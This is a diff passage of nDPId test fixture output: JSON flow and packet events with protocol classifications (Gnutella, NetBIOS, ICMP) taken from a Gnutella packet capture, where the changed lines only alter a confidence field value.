-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5915,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":400872,"flow_last_seen":400872,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":400872,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.238.172.250","src_port":28681,"dst_port":23548,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5915,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":400872,"flow_last_seen":400872,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":400872,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.238.172.250","src_port":28681,"dst_port":23548,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5917,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":759,"flow_packet_id":2,"flow_last_seen":400901,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":400901,"pkt":"CAAn5uVZUlQAEjUCCABFAABEDpQAAEARSh5o7qz6CgACD1v8cAkAMAJCYiULNgAJMsdiJQs2AAlj5TEBABEAAABHVEtHCgABAABiJQs2AAljxQ=="} 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5919,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":758,"flow_packet_id":2,"flow_last_seen":401028,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":401028,"pkt":"AQBef\/\/6CAAn5uVZCABFAADK4LgAAAER3GEKAAIP7\/\/\/+sQlB2wAtikJTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogTWljcm9zb2Z0IEVkZ2UvOTkuMC4xMTUwLjMwIFdpbmRvd3MNCg0K"} 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5928,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":758,"flow_packet_id":3,"flow_last_seen":402032,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":402032,"pkt":"AQBef\/\/6CAAn5uVZCABFAADK4LkAAAER3GAKAAIP7\/\/\/+sQlB2wAtikJTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogTWljcm9zb2Z0IEVkZ2UvOTkuMC4xMTUwLjMwIFdpbmRvd3MNCg0K"} @@ -2835,7 +2835,7 @@ 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6044,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":229240,"flow_last_seen":229240,"flow_idle_time":200000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":414496,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"62.35.190.5","src_port":28681,"dst_port":18604,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6044,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":229239,"flow_last_seen":229239,"flow_idle_time":200000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":414496,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"91.179.185.126","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6044,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":229239,"flow_last_seen":229239,"flow_idle_time":200000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":414496,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"91.179.185.126","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00627{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6044,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":288409,"flow_last_seen":288409,"flow_idle_time":140000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":414496,"l3_proto":"ip4","src_ip":"164.132.10.25","dst_ip":"10.0.2.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00627{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6044,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":288409,"flow_last_seen":288409,"flow_idle_time":140000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":414496,"l3_proto":"ip4","src_ip":"164.132.10.25","dst_ip":"10.0.2.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6044,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":229239,"flow_last_seen":229239,"flow_idle_time":200000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":414496,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.122.233.15","src_port":28681,"dst_port":11488,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6044,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":229239,"flow_last_seen":229239,"flow_idle_time":200000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":414496,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.122.233.15","src_port":28681,"dst_port":11488,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6149,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":243620,"flow_last_seen":243620,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":424016,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"62.102.148.166","src_port":28681,"dst_port":31332,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -2876,7 +2876,7 @@ 00566{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6149,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":243616,"flow_last_seen":288106,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":424016,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.140.63.147","src_port":28681,"dst_port":29545,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6215,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":431178,"flow_last_seen":431178,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":431178,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00704{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6215,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":760,"flow_packet_id":1,"flow_last_seen":431178,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":431178,"pkt":"\/\/\/\/\/\/\/\/CAAn5uVZCABFAADlHP4AAIARA\/0KAAIPCgAC\/wCKAIoA0frqEQKcMAoAAg8AigC7AAAgRU5GREVGRUVFSEVGRkhFSkVPREJEQUNBQ0FDQUNBQ0EAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAOgDAAAAAAAAAAAhAFYAAwABAAAAAgAyAFxNQUlMU0xPVFxCUk9XU0UAAQAAUwcATVNFREdFV0lOMTAAAAAAAAoAAxAAAA8BVaoA"} -00744{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6215,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":431178,"flow_last_seen":431178,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":431178,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00744{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6215,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":431178,"flow_last_seen":431178,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":431178,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6223,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":431829,"flow_last_seen":431829,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":431829,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"195.132.75.56","src_port":28681,"dst_port":56009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6223,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":761,"flow_packet_id":1,"flow_last_seen":431829,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":431829,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0QZQAAIAR3lkKAAIPw4RLOHAJ2skAIDh8R05EEEAkAQFUC1FLUlAGUk5BXS\/iNQlw"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6230,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":751,"flow_packet_id":3,"flow_last_seen":431830,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":431830,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0mm4AAIARSEcKAAIPQ8EINHAJlrgAID9OR05EEEArAQFUC1FLUlAGUk5BXS\/iNQlw"} @@ -3076,48 +3076,48 @@ 00565{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":82059,"flow_last_seen":433137,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"90.59.253.186","src_port":28681,"dst_port":15555,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00565{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":82062,"flow_last_seen":431831,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"91.172.15.182","src_port":28681,"dst_port":37829,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00564{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":82062,"flow_last_seen":431829,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.239.62.213","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":90005,"flow_last_seen":287355,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4793,"flow_avg_l4_payload_len":299,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.120.73.215","src_port":28681,"dst_port":24562,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":90005,"flow_last_seen":287355,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4793,"flow_avg_l4_payload_len":299,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.120.73.215","src_port":28681,"dst_port":24562,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00565{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":82063,"flow_last_seen":373495,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"177.231.151.16","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00563{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":83520,"flow_last_seen":431830,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.30.86.144","src_port":28681,"dst_port":53821,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90184,"flow_last_seen":288014,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3860,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.198.244","src_port":28681,"dst_port":1194,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90184,"flow_last_seen":288014,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3860,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.198.244","src_port":28681,"dst_port":1194,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00565{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":82063,"flow_last_seen":371839,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"190.153.143.54","src_port":28681,"dst_port":65535,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00565{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":82060,"flow_last_seen":373496,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"87.69.142.133","src_port":28681,"dst_port":15471,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90073,"flow_last_seen":287523,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3852,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"46.128.114.107","src_port":28681,"dst_port":6578,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00803{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":90072,"flow_last_seen":320293,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":5333,"flow_avg_l4_payload_len":313,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"103.232.107.100","src_port":28681,"dst_port":43508,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90073,"flow_last_seen":287523,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3852,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"46.128.114.107","src_port":28681,"dst_port":6578,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00803{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":90072,"flow_last_seen":320293,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":5333,"flow_avg_l4_payload_len":313,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"103.232.107.100","src_port":28681,"dst_port":43508,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00562{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":82062,"flow_last_seen":433134,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.88.92.56","src_port":28681,"dst_port":21009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00566{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":82063,"flow_last_seen":431830,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"165.169.195.227","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":89966,"flow_last_seen":287418,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4798,"flow_avg_l4_payload_len":299,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":28681,"dst_port":26253,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":89966,"flow_last_seen":287418,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4798,"flow_avg_l4_payload_len":299,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":28681,"dst_port":26253,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00564{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":82061,"flow_last_seen":433137,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.131.24.72","src_port":28681,"dst_port":30711,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00798{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":90039,"flow_last_seen":287497,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.181.251.218","src_port":28681,"dst_port":36368,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": 